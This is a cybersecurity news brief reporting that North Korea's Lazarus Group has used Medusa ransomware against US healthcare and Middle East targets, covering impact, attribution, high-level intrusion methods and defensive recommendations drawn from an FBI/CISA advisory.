North Korea's Lazarus Group has expanded its extortion arsenal, deploying Medusa ransomware against at least one US healthcare organization and an unnamed Middle East victim, according to threat hunters at Symantec and Carbon Black. The US healthcare attempt was thwarted, but the Middle East target was successfully encrypted. Medusa's data-leak site has listed nearly 30 victims since November 2025, with ransom demands averaging $260,000 over a four-month window.

What Happened

Symantec and Carbon Black researchers disclosed in a Tuesday report that Lazarus operators have begun leveraging Medusa, a ransomware-as-a-service platform run by the Spearwing cybercrime crew. The attack against the US healthcare entity failed before encryption, while the Middle East organization was fully impacted by the Medusa strain. Researchers cautioned that attribution across all 30 leak-site victims remains murky, since affiliates other than Lazarus also use the Medusa toolkit. Four of the recent victims are US healthcare and nonprofit entities, including a mental health nonprofit and a school for children with autism.

What Was Taken

Specific data volumes from the Middle East victim have not been publicly disclosed. Medusa operations typically involve double-extortion: exfiltrating sensitive files before encryption and threatening publication on the group's leak site. In the broader Medusa victim pool, stolen data has historically included patient records, financial documents, intellectual property, and operational data from organizations across medical, education, legal, insurance, technology, and manufacturing sectors. The US healthcare target avoided data loss because the intrusion was disrupted prior to ransomware deployment.

Why It Matters

Lazarus pivoting to a commodity RaaS platform is a notable shift for a state-sponsored actor previously associated with bespoke families like Maui and Play. Borrowing affiliate infrastructure muddies attribution, lets Pyongyang piggyback on Spearwing's tradecraft, and accelerates revenue generation for a regime under heavy sanctions. The continued targeting of healthcare, including a mental health nonprofit and a facility serving autistic children, underscores that Lazarus subgroups such as Andariel (Stonefly, Onyx Sleet, Silent Chollima) remain willing to disrupt life-critical services for cash. With more than 366 Medusa attacks claimed since 2023 and a March 2025 FBI/CISA advisory still in effect, defenders in regulated sectors should treat Medusa indicators as a Lazarus-adjacent concern.

The Attack Technique

Researchers have not published a full intrusion chain for these specific incidents. Andariel, the Lazarus subgroup tied to North Korea's Reconnaissance General Bureau, has historically gained initial access through exploitation of unpatched public-facing applications, credential abuse, and IT worker infiltration schemes. Once inside, operators deploy commodity ransomware such as Medusa, Maui, or Play to monetize access. The use of Medusa suggests either a direct affiliate relationship with Spearwing or access to leaked Medusa builders and infrastructure. The US Justice Department has previously charged Andariel members, including Rim Jong Hyok in July 2024 and Song Kum Hyok in July 2025, in connection with hospital ransomware campaigns.

What Organizations Should Do

1. Apply the joint FBI/CISA Medusa advisory mitigations, including patching internet-facing systems and disabling unused remote services such as RDP.
2. Enforce phishing-resistant MFA across email, VPN, and privileged accounts to blunt Lazarus credential theft and IT worker schemes.
3. Hunt for known Medusa and Andariel TTPs, including suspicious PowerShell, BYOVD driver abuse, and unusual SMB lateral movement.
4. Maintain offline, immutable backups and rehearse restoration to defeat double-extortion leverage.
5. Vet remote IT contractors and new hires for North Korean IT worker indicators, including mismatched identity documents and VPN-masked geolocation.
6. Block known Medusa leak-site infrastructure and report incidents to CISA, FBI, and HHS HC3 to support broader attribution work.

Sources: Lazarus Group targets healthcare orgs with Medusa ransomware